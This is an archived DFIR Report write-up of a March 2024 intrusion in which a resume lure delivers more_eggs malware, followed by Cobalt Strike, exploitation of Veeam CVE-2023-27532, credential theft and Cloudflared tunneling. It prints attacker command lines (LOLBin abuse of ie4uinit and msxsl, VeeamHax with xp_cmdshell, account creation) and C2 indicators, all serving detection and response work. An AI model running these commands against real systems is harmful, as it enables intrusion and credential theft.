{ "id": "37b456fb-f01a-4f3a-b24a-d6506d6995ff", "created_at": "2026-04-06T00:17:07.145637Z", "updated_at": "2026-04-10T03:36:08.267193Z", "deleted_at": null, "sha1_hash": "b2fcc8df93282696196d20c2c84266dcaf293c35", "title": "The Curious Case of an Egg-Cellent Resume - The DFIR Report", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6870796, "plain_text": "The Curious Case of an Egg-Cellent Resume - The DFIR Report\r\nBy editor\r\nPublished: 2024-12-02 · Archived: 2026-04-05 20:07:17 UTC\r\nKey Takeaways\r\nInitial access was via a resume lure as part of a TA4557/FIN6 campaign.\r\nThe threat actor abused LOLbins like ie4uinit.exe and msxsl.exe to run the more_eggs malware.\r\nCobalt Strike and python-based C2 Pyramid were employed by the threat actor for post-exploitation activity.\r\nThe threat actor abused CVE-2023-27532 to exploit a Veeam server and facilitate lateral movement and privilege\r\nescalation activities.\r\nThe threat actor installed Cloudflared to assist in tunneling RDP traffic.\r\nThis case was first published as a Private Threat Brief for customers in April of 2024.\r\nEight new rules were created from this report and added to our Private Detection Ruleset.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon. \r\nThe DFIR Report Services\r\nPrivate Threat Briefs: Over 20 private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights\r\nreports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 150+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test examples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nTable of Contents:\r\nCase Summary\r\nServices\r\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCommand and Control\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 1 of 38\n\nIn March 2024, an investigation took place after malicious activity was detected. Upon analysis, it was identified that a\r\nthreat actor was able to infect and pivot from a user endpoint to two servers in the environment.\r\nThe threat actor was able to gain access by submitting a job application that pointed to a resume lure. This initial access\r\ncampaign was observed by Proofpoint who attribute it to the group they track as TA4557. This group has historically\r\noverlapped with FIN6 activity, and has tooling overlaps with Cobalt Group and Evilnum.\r\nAfter being directed to an online resume site from the job posting notice, the victim downloaded the fake resume zip and\r\nexecuted the malicious .lnk file within the zip. This started an execution flow with the threat actor using the ie4uinit.exe\r\nMicrosoft executable to side-load a malicious .inf file. After that, the process dropped a malicious DLL which was executed\r\nusing WMI. This then created a scheduled task, followed by another WMI process to load malicious JScript using the\r\nmsxsl.exe Microsoft binary. This was the final more_eggs payload that established beacon activity to the command and\r\ncontrol server.\r\nSome initial discovery commands were then run using Microsoft binaries like nltest, net, and whoami. Activity mostly\r\nceased until approximately one and a half days later when Cobalt Strike was dropped on the beachhead. First we observed\r\nthe threat actor create shadow copies using vssadmin, which we assess was likely for trying to access credentials. This was\r\nfollowed up with some initial discovery using Microsoft utilities and the creation of a new user on the system.\r\nThe threat actor then used SharpShares and Seatbelt to further enumerate the host and the environment. The threat actor then\r\nattempted to deploy Pyramid on the beachhead, and while it was executed after much trouble, we observed little action from\r\nit or communication to its command and control server. After Pyramid, the threat actor began looking for lateral movement\r\noptions. They decided to target a backup server running Veeam software. They were able to exploit the vulnerability, CVE-2023-27532, on the server and used the access to create a new local administrator account.\r\nUsing the new account on the backup server they used RDP to connect from the beachhead. During this and later RDP\r\npivoting activity, the threat actor leaked several host names that tie to other intrusions that ended with a Fog ransomware\r\ndeployment, as reported by Arctic Wolf. On the backup server the threat actor deployed their Cobalt Strike payload and\r\ncontinued discovery activity with more SharpShares and Seatbelt activity and then AdFind. At this time, on the backup\r\nserver, LSASS memory was accessed for credentials.\r\nFollowing this, the threat actor targeted a second server and this time used a remote service to replicate the creation of a new\r\nlocal administrator account on this second server. This service was created using a domain administrator account indicating\r\nthe previous LSASS access was successful. The threat actor then checked various privileged users in the environment before\r\nlocating a disabled domain administrator account that they re-enabled.\r\nOn the backup server, the threat actor then used the browser to access the file sharing site temp.sh to download a zip file\r\ncontaining a Cloudflared installer. The MSI installer in the zip was then run and Cloudflared was installed as a service on the\r\nserver. They then connected to the second server using RDP and repeated the install process there. On this server, they then\r\ncreated another new user and added them to the local administrator group.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 2 of 38\n\nThe threat actor then started a new RDP session with the new user and then dropped and executed SoftPerfect Network\r\nScanner. After the scan, the threat actor opened a few files from a remote file share and then activity ceased for the day.\r\nThe following day the threat actor returned, pinging a host on a remote network. After this, they then removed the\r\nmore_eggs files and persistence task on the beachhead and beaconing to more_eggs command and control ceased. The\r\nCobalt Strike and Cloudflared tunnels remained active but no further activity was observed before the threat actor was\r\nevicted.\r\nFurther open-source investigation into the fake resume campaign identified numerous other lure sides with the same\r\ntemplates and images following the same \u003cname\u003e.com format.\r\nThis campaign is still ongoing with minimum changes to the lure websites or malware deployment observed. A list of\r\ndomains identified are included in the indicators section of the report.\r\nWhile the more_eggs malware and fake resume lures have been used by TA4557/FIN6 as early as 2018, this specific\r\ncampaign appeared to have been established in late 2023. Below includes some previous analysis on the same campaign:\r\nProofpoint\r\nTrend Micro\r\neSentire\r\nCritical Start\r\nIf you would like to get an email when we publish a new report, please subscribe here.\r\nAnalysts\r\nAnalysis and reporting completed by @_pete_0, Zach Stanford (aka @svch0st), and guest contributor Kelsey Merriman\r\n(aka @k3dg3) from Proofpoint\r\nInitial Access\r\nProofpoint has been tracking TA4557 since 2018 as a skilled, financially motivated threat actor known to distribute the\r\nexclusive more_eggs backdoor, which can profile the endpoint and send additional payloads. TA4557 notably differs from\r\nother priority threat actors due to the unique tool and malware usage, campaign targeting, job candidate-themed lures,\r\nsophisticated evasive measures, distinct attack chains, and notable infrastructure patterns.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 3 of 38\n\nThroughout 2024, Proofpoint has observed TA4557 use multiple delivery approaches when targeting employees involved in\r\nthe hiring process, including:\r\nSending emails directly to employees containing instructions guiding the recipient to navigate to a resume-themed\r\nwebsite that ultimately leads to malware delivery. The actor used various methods to prevent security tools from\r\nrecognizing the domain in the email body, seemingly to avoid automated analysis. Examples include leaving a space\r\nor underscore before the TLD in the email body.\r\nSending benign emails directly to employees, waiting for a response, then replying with an email containing\r\ninstructions guiding the recipient to navigate to a resume-themed website that ultimately leads to malware delivery\r\nmasquerading as a fake candidate and applying to legitimate job postings on various employment websites. The actor\r\ntypically uploaded a resume to the job application containing instructions that guided users to a fake candidate web\r\npage.\r\nIn March 2024, Proofpoint observed the use of the third approach in an email from a job board notifying a user that a\r\nnew candidate (TA4557) had applied to the user’s open job posting. Our intrusion files and lure site matched this\r\ncampaign.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 4 of 38\n\nIn our intrusion, we were able to identify the origin of the malicious payload that was executed by parsing the user’s Edge\r\nSQLite databases.\r\nThe user downloaded John Shimkus.zip from the domain johnshimkus[.]com. The site had a captcha when the Download\r\nCV button was clicked and regenerates a unique download URL when we attempted to analyze the site further.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 5 of 38\n\nWhen visited from a Linux User Agent, the site returns a basic text resume instead of the download link in an attempt to\r\navoid analysis.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 6 of 38\n\nThe same website template and stock image was used in a TA4557 campaign that Proofpoint covered below:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 7 of 38\n\nExecution\r\nOnce the victim uncompressed the zip, they clicked the Windows Shortcut file John-_Shimkus.lnk which executed the\r\ninfection flow.\r\nOf note, the image 2.jpg that was alongside the payload in the .zip was not used by the malware. We assess that it was likely\r\nused to “pad” the zip in order to decrease detection potential.\r\nUpon execution of the Windows Shortcut, there were several steps of execution that are discussed further below.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 8 of 38\n\nStarting with the .lnk , we were able to parse the file which revealed a long, obfuscated argument.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 9 of 38\n\nAfter decoding the cmd.exe argument, it becomes the following command, which outputs text to the ieuinit.inf file:\r\n(for %%a in (\"[089F]\" \"sc\\\" \"ro%%Clarify%%j,NI,%%Serious%%%%Departments%%%%Departments%%p%%Jaguar%%%%Groups%%%\r\nAnd then moves a legitimate copy of the binary, ie4uinit.exe, to a custom location while also setting some additional\r\nenvironment variables.\r\ncall xcopy /Y /C /Q %%windir%%\\system32\\ie4uinit.exe \"%%appdata%%\\microsoft\\*\" | set Pupils59=Seats \u0026\u0026 start \"\r\nThis section of commands appeared as follows in the process activity on the beachhead host:\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" call xcopy /Y /C /Q %%windir%%\\system32\\ie4uinit.exe \"%APPDATA%\\microsoft\\\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" set Pupils59=Seats \"\r\nxcopy /Y /C /Q %WINDIR%\\system32\\ie4uinit.exe \"%APPDATA%\\microsoft\\*\"\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" start \"\" wmic process call create \"%APPDATA%\\microsoft\\ie4uinit.exe -bases\r\n%WINDIR%\\system32\\cmd.exe /S /D /c\" set \"Pupils4=Involves Bestsellers Clubs Discussions Crane Acquire Switch Y\r\nQuote Thesis Makers Gives Folks Quality Vital Posters Paintings Diamond Legend Crucial Installations Across Su\r\nDisabilities Desert Baskets Ghost Recall Illustrations Pattern Friend Spoon Agents Directories Paperbacks Spik\r\nwmic process call create \"%APPDATA%\\microsoft\\ie4uinit.exe -basesettings\"\r\n%APPDATA%\\microsoft\\ie4uinit.exe -basesetting\r\nAbusing ie4uinit.exe (LOLBin)\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 10 of 38\n\nThe flow uses a documented execution hijack of IE4uinit.exe (https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/). By\r\nsupplying a “side-loaded” .inf file to IE4uinit.exe, it can be used to load and execute COM scriptlets (SCT) from remote\r\nservers. In this case it was observed to reach out to the URL:\r\nhxxp://a92837f.johnshimkus[.]com/setthevar\r\nThis was visible from the host via a DNS lookup by the ie4uinit.exe process:\r\nAnd with a Suricata rule:\r\nWe can also use Prefetch to confirm that ie4uinit.exe interacted with the malicious ieuinit.inf:\r\nMore_Eggs\r\nShortly after the execution of ie4uinit.exe, the DLL 20350.dll was dropped in the AppData folder. The process wmiprvse.exe\r\nthen spawned the following command:\r\nregsvr32 /s /n /i:Action \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Microsoft\\20350.dll\"\r\nThis DLL created .txt files as well as the legitimate MSXSL executable that were used in the next stage of execution:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 11 of 38\n\nC:\\ProgramData\\Microsoft\\51D7701F6EB775C7.txt (XML - Schtask)\r\nC:\\ProgramData\\Microsoft\\29D88F75006BE8A.txt (XML - more_eggs script)\r\nC:\\ProgramData\\Microsoft\\178F2E426.txt\r\nC:\\ProgramData\\Microsoft\\msxsl.exe (Legitimate Binary)\r\nThe chain then used schtasks to setup persistence for the more_eggs malware.\r\nschtasks /Create /TN \"8766714F94DD\" /XML \"C:\\ProgramData\\Microsoft\\51D7701F6EB775C7.txt\"\r\nAbusing msxsl.exe to deploy more_eggs\r\nThe more_eggs payload was finally loaded using the msxsl.exe binary using the documented technique – https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/ :\r\nC:\\ProgramData\\Microsoft\\msxsl.exe 29D88F75006BE8A.txt 29D88F75006BE8A.txt\r\nThe file provided to msxsl.exe, 29D88F75006BE8A.txt, was an obfuscated JScript to load the more_eggs malware.\r\nAfter executing, the more_eggs malware consistently ran the command:\r\ntypeperf.exe \"\\System\\Processor Queue Length\" -si 180 -sc 1\r\nTypeperf is a Microsoft utility that is used collect performance data from a specified counter. In this case the Process Queue\r\nLength details the threads in the processor. The parameters -si indicates the sample interval in seconds (3 minutes), with -sc\r\nindicating the number of samples collected.\r\nThe pattern generated approximately 20 new process creation events per hour throughout the duration of the intrusion. This\r\nwas based on the parameter of 180 seconds, 60 minutes (hour) / 3 minutes (180 seconds) = 20 processes.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 12 of 38\n\nMore than one and a half days after initial infection, the threat actor deployed a Cobalt Strike Beacon using regsvr.32.exe:\r\nregsvr32.exe /s /n /i \"C:\\ProgramData\\31765.ocx\"\r\nThe .OCX file was an unsigned DLL file, with a size of 230KB.\r\nPersistence\r\nmore_eggs\r\nDuring the initial more_eggs execution a scheduled task command was run:\r\nschtasks /Create /TN \"8766714F94DD\" /XML \"C:\\ProgramData\\Microsoft\\51D7701F6EB775C7.txt\"\r\nThe schtasks command was run with the /XML flag pointing to a text file dropped by the threat actor. This flag according to\r\nthe Microsoft documentation:\r\nCreates a task specified in the XML file. Can be combined with the /ru and /rp parameters, or with\r\nthe /rp parameter by itself if the XML file already contains the user account information.\r\nSo while using a text extension, the file was a ready made task for persistence. The task itself used a Boot Trigger to restart\r\nthe malware after restart activity on the host.\r\nThe command arguments in the task pointed to a file on disk 178F2E426.txt containing:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 13 of 38\n\nWhen decoded we can see the script would result in the execution of msxsl.exe and the more_eggs script files disguised as\r\ntext files.\r\nCloudflared\r\nOn a backup server the threat actor downloaded a zip file named cloudflared.zip from the temp.sh file sharing site using\r\nInternet Explorer. We can see the internet explorer process write the file and extract the download url from the\r\nWebCacheV01.dat file for the user.\r\nThe threat actor then installed the tool Cloudflared through the MSI installer on two hosts in the environment. Cloudflared is\r\na tool that can be used to tunnel traffic through Cloudflare’s services. This allows the threat actor to proxy access to the\r\nprivate network through the tunnel.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 14 of 38\n\n\"C:\\Windows\\System32\\msiexec.exe\" /i \"C:\\ProgramData\\cloudflared\\cloudflared-windows-amd64.msi\"\r\nServer Command Line Decoded Config (Redacted with Example Text)\r\nBackup\r\nServer\r\ncloudflared-windows-amd64.exe\r\nservice install\r\neyJ\u003cREDACTED\u003eJ9\r\n{“a”:”ddce269a1e3d054cae349621c198dd52″,”t”:”e8c8cb73-248f-4b39-9cf9-\r\nc6fb3b89edb9″,”s”:”AMYNzTjTCQQtlLE5j0ZY4zDYMwxj2wAMZTzQYUOjYZzMh0ty\r\nAn app\r\nserver\r\ncloudflared.exe\r\nservice install\r\neyJ\u003cREDACTED\u003eJ9\r\n{“a”:”ddce269a1e3d054cae349621c198dd52″,”t”:”35575e50-eae2-4d40-bcee-5a1986b0df1e”,”s”:”TYWmL3jYjMZMAwN3NMZBU3iMEMZ0mTJztgNhEW1jODMTG\r\nThe MSI and subsequent command would install the service (System EID 7045) as Cloudflared agent with the start type of\r\nauto start. This would allow persistent access through the tunnel established by the agent.\r\nInstallation of the CloudFlared results in Cloudflared Windows Events being logged in the Application log. The events\r\nindicating the Cloudflared service starting and the tunnel being established were recorded as Event ID 1 – Cloudflared.\r\nFollowed by tunnel establishment:\r\nCreate Accounts\r\nDuring the intrusion the threat actor created four different user accounts. Three were local users and added to the host’s local\r\nAdministrators group with a final user account being added to the domain and domain Administrators group. All of the users\r\nwere added using net.exe but the commands were initiated via a variety of ways including local command shells, application\r\nexploits, and remote services.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 15 of 38\n\nUser names observed during the intrusion:\r\nUser Scope Host Execution Method\r\nbackup local beachhead Local cmd spawned from Cobalt Strike\r\nsqlbackup local backup server exploit\r\nsqlbackup local management server Remote service\r\nadm_1 domain management server Cmd spawned from interactive RDP session\r\nPrivilege Escalation\r\n The threat actor then used a modified version of VeeamHax (https://github.com/sfewer-r7/CVE-2023-27532). This tool\r\nexploited CVE-2023-27532. Below is a side by side of the decompiled version we observed and the source. The main\r\nchanges were to allow arbitrary SQL commands to be supplied as an argument evaluated on the Veeam target.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 16 of 38\n\nThe –cmd argument gets executed through a hard coded xp_cmdshell command. As seen below, the threat actor stuck to\r\nusing the default value in the original version of the VeeamHax exploit – c:\\windows\\notepad.exe.\r\nThis ended up being executed on the target SQL server but did not serve any purpose to their goals. The notepad process was\r\nused for Proof of Concept purposes. In this execution context, Notepad.exe is considered a harmless process that does not\r\nlead to any malicious activity. The –sql argument was the custom addition to the script that would allow arbitrary SQL\r\ncommands to be passed to the exploit.\r\nThe threat actor ran the following commands using their custom version of VeeamHax.exe to enable xp_cmdshell before\r\ncreating a local administrator named sqlbackup with the password of Password!1221!.\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"select @@ver\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC sp_conf\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"RECONFIGURE\"\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC sp_conf\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"RECONFIGURE\"\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC master\r\nVeeamHax.exe --verbose --target \u003cbackup server\u003e --port 9401 --cmd \"c:\\windows\\notepad.exe\" --sql \"EXEC master\r\nThe VeeamHax.exe binary included the developers Program Database (PDB) string as:\r\nE:\\Developer\\yahtochka\\2\\CVE-2023-27532\\obj\\Release\\VeeamHax.pdb\r\nFrom the backup server we observed the net commands executed by the MSSQL process.\r\n\"%WINDIR%\\system32\\cmd.exe\" /c net user sqlbackup Password!1221! /add\r\n\"%WINDIR%\\system32\\cmd.exe\" /c net localgroup administrators sqlbackup /add\r\nThe Security event log recorded the local account creation in Event ID 4720:\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 17 of 38\n\nSQL Server associated Windows Application Event IDs for xp_cmdshell enable, followed by cmd execution are indicated by\r\ntwo event IDs 15457 in quick succession:\r\nFirst event relates to enabling xp_cmdshell:\r\nFollowed by the xp_cmdshell execution:\r\nPayload Failures\r\nWhile the VeeamHax.exe process executed successfully, the process was observed terminating in the Windows Application\r\nEvent Log under Event ID 1000 (Provider: Application Error). This indicates that the exploit didn’t safely handle exception\r\nerrors, resulting in an application crash.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 18 of 38\n\nWith an associated ‘.Net Runtime’ error:\r\nThe attacker was observed executing the process on several occasions, each time several application error events were\r\nobserved. Resulting in associated Windows Error Reporting Event ID 1001 (Provider: Windows Error Reporting) being\r\ngenerated.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 19 of 38\n\nA WerFault process invoked by an application indicates that the application terminated unexpectedly. There were multiple\r\nexploit attempts by the threat actor in a short time frame.\r\nDefense Evasion\r\nThe threat actor removed files and artifacts from hosts throughout the intrusion. For example the more_eggs payload deleted\r\nits own DLL after execution.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 20 of 38\n\nThis behavior continued throughout the intrusion.\r\nDuring the intrusion, after the threat actor pivoted to a backup server we observed a log event for Windows Defender being\r\ndisabled. We observed no process event tied to this so we assess that this action was performed by the threat actor in the GUI\r\nwith their RDP session.\r\nNamed pipes\r\nFrom the Cobalt Strike regsvr32 process we observed usage of default Cobalt Strike named pipes.\r\nPipes observed:\r\n\\postex_18ab\r\n\\postex_77cb\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 21 of 38\n\nCredential Access\r\nDuring the RDP session on the backup server, the threat actor opened powershell_ise.exe and ran the script Veeam-Get-Creds.ps1 (https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1).\r\nThe PowerShell operational log with event ID 4103 and 4104 tracked the output of the script which highlighted they\r\nsuccessfully extracted an Administrator password from the Veeam database.\r\nThe LSASS process on the backup server was accessed via the RunDll32 (Cobalt Strike) beacon using a well known\r\nGranted Access pattern of 0x1010 – PROCESS_QUERY_LIMITED_INFORMATION (0x1000) \u0026 PROCESS_VM_READ\r\n(0x0010)\r\nThe RunDll32 process was also observed interacting with other processes such as cmd.exe and RunDll32.exe, using\r\nSYSTEM, a compromised account domain administrator account and a newly created local account.\r\nSystem Recovery\r\nThe use of the Microsoft utility VSSADMIN (Volume Shadow Copy Service) was observed on the beachhead host for\r\nlisting the configured shadows and then creating a new shadow. It appears that the threat actor had trouble executing the\r\ncommand and repeated the attempt again with an extra ‘cmd’ invocation.\r\nC:\\Windows\\system32\\cmd.exe /C vssadmin list shadows\r\nC:\\Windows\\system32\\cmd.exe /C vssadmin create shadow /for=C: 2\u003e\u00261\r\nC:\\Windows\\system32\\cmd.exe /C vssadmin create shadow\r\nC:\\Windows\\system32\\cmd.exe /C cmd /c vssadmin create shadow /for=C: 2\u003e\u00261\r\nWe never observed any interaction with the created shadow copy. It’s unclear why the threat actor initiated this command. A\r\nhypothesis to why a shadow volume would be created, would be to extract credentials via local saved stores (SAM hives for\r\nexample as this was not a Domain Controller).\r\nThere is a an identical ‘vssadmin’ command detailed on various Red Team tutorials (https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin)\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 22 of 38\n\nDiscovery\r\nInitial discovery actions started around 10 minutes after the initial execution of the malware. Standard Windows utilities\r\nwere used:\r\ncmd /v /c nltest /trusted_domains \u003e \"%TEMP%\\22041.txt\" 2\u003e\u00261\r\ncmd /v /c net group /domain \"Domain Admins\" \u003e \"%TEMP%\\51362.txt\" 2\u003e\u00261\r\ncmd /v /c whoami /upn \u003e \"%TEMP%\\26906.txt\" 2\u003e\u00261\r\nThe threat actor later used the Cobalt Strike beacon to execute numerous other discovery commands:\r\n%WINDIR%\\system32\\cmd.exe /C query session\r\n%WINDIR%\\system32\\cmd.exe /C nslookup\r\n%WINDIR%\\system32\\cmd.exe /C ping -n 1 \u003cDOMAIN\u003e\r\n%WINDIR%\\system32\\cmd.exe /C net usre REDACTED /dom\r\n%WINDIR%\\system32\\cmd.exe /C net user REDACTED /dom\r\nWe suspect the threat actor was using the execute-assembly function of the Cobalt Strike beacon as there were several\r\ninstances of rundll32.exe that had dotNet code injected into them.\r\nThe victim organization was recording certain key ETW providers which allows us to capture the threat actor loading certain\r\nmodules. The following was recorded, which highlighted the threat actor using the known enumeration tool Seatbelt and\r\nSharpShares.\r\nMicrosoft-Windows-DotNETRuntimeRundown {A669021C-C450-4609-A035-5AF59AF4DF18}\r\nSeatbelt\r\n\"EventID\":153\r\n\"CommandLine\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\"\r\n\"ModuleILPath\":\"Seatbelt\"\r\n\"ManagedPdbBuildPath\":\"Z:\\\\Agressor\\\\github.com-GhostPack\\\\Seatbelt-master\\\\Seatbelt\\\\obj\\\\Debug\\\\Seatbelt.pdb\r\nSharpShares\r\n\"EventID\":153\r\n\"CommandLine\":\"C:\\\\Windows\\\\system32\\\\rundll32.exe\"\r\n\"ModuleILPath\":\"SharpShares\"\r\n\"ManagedPdbBuildPath\":\"C:\\\\Users\\\\mmoser\\\\source\\\\repos\\\\SharpShares\\\\SharpShares\\\\obj\\\\Release\\\\SharpShares.p\r\nThe execution of these tools generated the files seatinfo.txt and share.txt, which the threat actor viewed on host.\r\ntype C:\\programdata\\shares.txt (A list of file shares in the network)\r\ntype c:\\programdata\\seatinfo.txt (Output of Seatbelt)\r\nInvoking SharpShares or SeatBelt (both .NET/managed applications) within an unmanaged code-based process (e.g.,\r\nRunDLL32) results in the creation of a Common Language Runtime (CLR) usage log file as a side effect.\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\rundll32.exe.log\r\nThe presence of this file for a process such as RunDLL32.exe indicates that a .Net compiled payload has been executed. In\r\nthis case we can correlate this activity to the execute-assembly event.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 23 of 38\n\nOnce the threat actor was able to access the backup server, they ran adfind.exe to gather further information on the domain:\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nA network check was performed with route print followed by the creation of the following file C:\\ProgramData\\scaner.zip.\r\nShortly after, from the unzipped contents, the threat actor executed the Soft Perfect Netscan tool:\r\nC:\\ProgramData\\scaner\\scaner\\netscan.exe\r\nWithin the zip content, we observed that there were other previous saved scans from at least five other victim environments.\r\nThe license file accompanying netscan.exe is seen below:\r\n\u003c?xml version=\"1.0\"?\u003e\r\n\u003cnetwork-scanner-license\u003e\r\n \u003clicense\u003eo7fOIORWqaHfRIxHI1hcovfNXqvCKPNigA+oOK8UtlSJGu342vVWzuTLsR4R0bLA9Rdh+Skt6lkYR75knjO8Uw1/5N4t9qM0CRC\r\n \u003cupgrade\u003e0\u003c/upgrade\u003e\r\n \u003clanguage\u003eEnglish\u003c/language\u003e\r\n \u003cnmap\u003e\u003c/nmap\u003e\r\n \u003cautoupdate\u003e\r\n \u003cprompt\u003efalse\u003c/prompt\u003e\r\n \u003cenabled\u003efalse\u003c/enabled\u003e\r\n \u003clastcheck\u003e0\u003c/lastcheck\u003e\r\n \u003c/autoupdate\u003e\r\n\u003c/network-scanner-license\u003e\r\nShortly after the execution of netscan.exe, we observed a sudden increase in ICMP traffic which could be identified as a\r\nping sweep across the network. Below is a sample of network traffic that exemplifies the incremental destination IP\r\naddresses during the sweep.\r\nBy reviewing the compromised user’s Shellbags, we were able to identify the threat actor rummaging through the file shares\r\nof the network\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 24 of 38\n\nLocal accounts were enumerated on the beachhead host, and was indicated by a number of Windows Event ID 4799 events\r\nbeing created, with the calling process being ‘Rundll32.exe’. After translating the CallerProcessID from hex to decimal we\r\ncan correlate and confirm it as the Cobalt Strike process.\r\nLateral Movement\r\nAfter creating a local administrator account by exploiting CVE-2023-27532, the threat actor moved to a Veeam backup\r\nserver via Remote Desktop Protocol. Next, they pivoted again from the backup server to a second server in the environment\r\nusing RDP.\r\nAs they were proxying their requests through their existing malware, their workstation name was leaked in the\r\nauthentication event to reveal they were likely using Kali OS.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 25 of 38\n\nOnce on the backup server the threat actor ran Cobalt Strike on the host using rundll32.exe.\r\nrundll32.exe c:\\programdata\\payload_cr1.dll,DllInstall\r\nThis beacon had the same C2 details as the one used on the beachhead host.  \r\nAn additional threat actor workstation name, PACKERP-VUDV41R, was leaked in the authentication logs from the backup\r\nserver.\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 26 of 38\n\nOf note, both the host names kali and PACKERP-VUDV41R were observed in the Arctic Fox article regarding a FOG\r\nransomware case, along with several tools mentioned in this report.\r\nRemote Service Creation\r\nAfter exploiting Veeam and gaining access to the backup server the threat actor obtained credentials for a domain\r\nadministrator account. using this account they created a remote service on a management server and created a sqlbackup\r\nuser with the same properties as the one they created on the backup server.\r\nThis activity could be observed over the network with suricata rules:\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nAnd locally on the remote management server, 7045 events were created followed by process events to create the user\r\naccount locally on the host.\r\nAfter performing these actions the threat actor again used RDP to access this host.\r\nCommand and Control\r\nThe more_eggs malware was the most predominate command and control traffic until the threat actor deployed Cobalt\r\nStrike to the network which was significantly higher. As highlighted in the graph below, the Pyramid C2 was only used\r\nonce.\r\nmore_eggs\r\nThe more_eggs payload communicated with the following command and control address:\r\nIP Port Domain\r\n108.174.197.15 443 pin.howasit[.]com\r\nhttps://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nPage 27 of 38\n\nThis IP address has been tracked by the DFIR Threat Intelligence Group as active since mid March 2024 through November\r\n2024.\r\nCobalt Strike\r\nThe full beacon configuration was not recoverable however a partial configuration was picked up during a memory scan\r\nacross the environment:\r\n\"Server\":\"shehasgone.com\", (144.208.127[.]15)\r\n\"TargetUri\":\"/wp-includes/lu.png\",\r\n\"License\":2073085114\r\n\"Host: bing.com\"\r\n\"Connection: 